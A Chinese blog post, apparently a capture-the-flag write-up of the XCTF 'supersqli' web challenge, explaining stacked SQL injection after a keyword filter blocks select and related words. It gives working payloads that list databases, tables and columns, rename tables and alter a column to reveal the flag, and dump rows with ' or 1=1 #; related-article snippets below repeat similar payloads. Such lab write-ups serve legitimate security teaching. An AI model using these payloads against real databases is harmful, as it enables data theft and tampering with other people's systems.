功防世界--Web进阶--supersqli---堆叠注入

最新推荐文章于 2024-08-17 14:58:02 发布
最新推荐文章于 2024-08-17 14:58:02 发布
阅读量976 收藏
点赞数
分类专栏: xctf攻防世界Web 文章标签: html php sql web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/z2560088/article/details/120694778
版权

目录

信息搜集

payload

 

 

信息搜集

先添加一个单引号,报错,错误信息如下:

error 1064 : You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''1''' at line 1

接着测试--+注释,发现被过滤,然后使用#注释,可行 用order by语句判断出有两个字段,接着使用union select 爆字段,发现这个时候出现了如下提示:

return preg_match("/select|update|delete|drop|insert|where|\./i",$inject);

发现上面的关键字都被过滤不能使用了,没法进行注入,这个时候尝试一下堆叠注入

现在回到这道题,利用堆叠注入,查询所有数据库:

1';show databases;#

 

查询所有表:

1';show tables;#

查询words表中所有列:

1';show columns from words;#

查询1919810931114514表中所有列

1';show columns from `1919810931114514`;#      (字符串为表名操作时要加反引号)

根据两个表的情况结合实际查询出结果的情况判断出words是默认查询的表,因为查询出的结果是一个数字加一个字符串,words表结构是id和data,传入的inject参数也就是赋值给了id

 

payload

words即为inject表,注入的位置为id列   其对应的值为data列

将与words并列的表改为words表,并将flag列改为id列

1';rename tables `words` to `words1`;rename tables `1919810931114514` to `words`; alter table `words` change `flag` `id` varchar(100);#

然后读取当前表的所有信息 

1' or 1=1 #

 

Zhao蔫儿
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sql注入过滤select_SQL注入高级进阶-堆叠注入
weixin_39808803的博客
11-21 1310
原理0x00 堆叠注入定义 Stacked injections(堆叠注入)从名词的含义就可以看到应该是一堆 sql 语句(多条)一起执行。而在真实的运用中也是这样的, 我们知道在 mysql 中, 主要是命令行中, 每一条语句结尾加; 表示语句结束。这样我们就想到了是不是可以多句一起使用。这个叫做 stacked injection。0x01 堆叠注入原理 在SQL中,分号(;)是用来表示一条s...
攻防世界web进阶supersqli
gongjingege的博客
07-25 1848
打开链接,初步判断应该是sql注入 顺便查看一下源代码,发现sqlmap没有灵魂,估计应该不让用,得手工注入 先1’,报错 再–+,发现被正则过滤,大小写也不行 看了看大佬的wp,堆叠注入(呜,新名词。。。) inject=1’;show databases;# inject=1’;show tables;# 看一下这几个表 1’;show columns from words;# 1’;show columns from 1919810931114514;# (字符串为表名操作时要加反
堆叠注入详解
爱上卿的博客
02-27 3430
0x00 堆叠注入定义 Stacked injections(堆叠注入)从名词的含义就可以看到应该是一堆sql语句(多条)一起执行。而在真实的运用中也是这样的,我们知道在 mysql 中, 主要是命令行中,每一条语句结尾加; 表示语句结束。这样我们就想到了是不是可以多句一起使用。这个叫做stacked injection。 0x01 堆叠注入原理 在SQL...
攻防世界Websupersqli
Light_inthe_eyes的博客
10-15 126
题目名字提示就是SQL注入 先输入1,有回显: 判断注入类型,1'报错,1'#正常回显,说明时单字符类型注入: 判断字段的数量,1' order by 2#正常回显,1' oreder by 3#报错,说明字段量为2: 用union去 select查询,1' union select 1,database()#,发现被preg_match过滤了:正则表达式过滤了这些,那么只有采取其他方式进行注入,尝试用堆叠注入:1';show tables;#,发现有回显: 爆1919810931114514的字段:
32位tomcat-7.0.55 工具下载
08-25
Tomcat是Apache 软件基金会(Apache Software ...因为Tomcat 技术先进、性能稳定,而且免费,因而深受Java 爱好者的喜爱并得到了部分软件开发商的认可,成为目前比较流行的Web 应用服务器。目前最新版本是8.0。
进阶网际网络数据库应用(ppt-43页).ppt
10-27
进阶网际网络数据库应用】是指在互联网环境中,如何高效、安全地设计和实现数据库与应用程序的交互,以满足多样化的用户需求。随着互联网技术的发展,数据的类型和量级日益增长,从简单的文本、数字扩展到图像、...
uni-app
02-22
【uni-app】是一款由DCloud(即数字天堂)开发的多端开发框架,它允许开发者编写一次代码,就可以在iOS、Android、Web(H5)、微信小程序、支付宝小程序、百度小程序、字节跳动小程序等多个平台上运行。uni-app极大...
基于YOLO-lite的web实时人脸检测,tfjs人脸检测,目标检测
07-12
【作品名称】:基于YOLO-lite的web实时人脸检测,tfjs人脸检测,目标检测 【适用人群】:适用于希望学习不同技术领域的小白或进阶学习者。可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。 【项目介绍...
HTML静态网页成品作业(HTML+CSS)——古诗词网设计制作(5个页面)
2301_78945238的博客
08-14 1248
HTML静态网页成品作业(HTML+CSS)——古诗词网设计制作(5个页面)
3:html(CSS):基础语法3
最新发布
2301_76578848的博客
08-17 355
在这篇文章中,介绍了网页布局与id的内容,从而将网页更加美观,越来越贴近大家平时看到的网页了。当然现在的网页离成功还是有很大的路要走。
“从零开始的HTML 表格”——WEB开发系列09
一条晒干的咸鱼的博客
08-14 999
HTML 表格是一种用于在网页上组织和显示信息的结构性元素,它能够将数据以行和列的形式呈现,帮助用户更清晰地理解数据关系。表格在展示统计数据、产品列表、日程安排等方面非常实用。
salesforce rich text 字段支持html中内嵌JavaScript吗
Debug yourself!
08-13 427
如果你尝试在 Salesforce 的富文本字段中插入 JavaScript,代码会被过滤掉。推荐的方式是在适当的地方使用 Salesforce 支持的 JavaScript 功能,比如自定义按钮、Visualforce 页面或 Lightning 组件,而不是在富文本字段中直接嵌入脚本代码。
html+css+js网页设计 电商戴欧妮珠宝网3个页面 有轮播图,折叠面板,一键置顶等功能
qq_42431718的博客
08-13 298
html+css+js网页设计 电商戴欧妮珠宝网3个页面 有轮播图,折叠面板,一键置顶等功能 网页作品代码简单,可使用任意HTML编辑软件(如:Dreamweaver、HBuilder、Vscode 、Sublime 、Webstorm、Text 、Notepad++ 等任意html编辑软件进行运行及修改编辑等操作)。
Javaweb学习之HTML(二)
2301_80841939的博客
08-17 273
TML 响应式 Web 设计(Responsive Web Design, RWD)是一种网页设计方法,它使得网站能够根据不同的访问设备(如桌面电脑、平板电脑、智能手机等)的屏幕尺寸和分辨率来自动调整布局、图片大小、字体等,从而提供最佳的浏览体验。但是,请注意,在HTML文档中直接使用Unicode编码字符时,需要确保文档的编码(如UTF-8)能够支持这些字符。HTML5引入了一些新的字符实体,主要用于表示一些数学符号、技术符号以及特殊字符等,但这些新的字符实体在日常的HTML编码中并不常用。
html+css+js网页设计 电商模版4个页面
qq_42431718的博客
08-13 368
html+css+js网页设计 电商模版4个页面 带js 网页作品代码简单,可使用任意HTML编辑软件(如:Dreamweaver、HBuilder、Vscode 、Sublime 、Webstorm、Text 、Notepad++ 等任意html编辑软件进行运行及修改编辑等操作)。
掌握Golang的html/template:打造动态网页的秘籍
2401_85812053的博客
08-14 582
通过本文的介绍,你应该对Golang的包有了基本的了解。它是一个强大而灵活的工具,可以帮助你安全、高效地生成动态HTML内容。掌握它,你将能够在Web开发中更加游刃有余。通过上述步骤,你可以开始使用来构建你的Web应用了。记住,实践是学习的最佳方式,所以不要犹豫,开始编写你自己的模板吧!
2:html:基础语法2
2301_76578848的博客
08-15 1324
首先,表头的话是使用标签,但是他同样也是一行,所以表头,应该在下面,也就是说,要先创建一个行,然后再写自己想要的表头。可以看到其他的上面是一样的,在中是新的,代表是一张表格,然后代表是一行,是一行中的一个个模块,然后第二个指的是第二行的内容,结果就是如下。这个就是我的主页面中我的头像,你看到还有之前学的照片的运用方式,同样,在网页中,我们习惯性的将他分成一个一个块,然后每一个快都是用的标签进行操作。还有没有我们经常用的边框,与表头。
Kafka-Eagle监控工具:安装与使用指南
这可能包括检查Kafka-Eagle的Web界面是否可以访问,监控数据是否正确显示,以及各项功能是否能够正常使用。通过Kafka-Eagle的界面,用户可以直观地查看每个topic的offset情况,监控消费者的lag,分析partition的分布...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值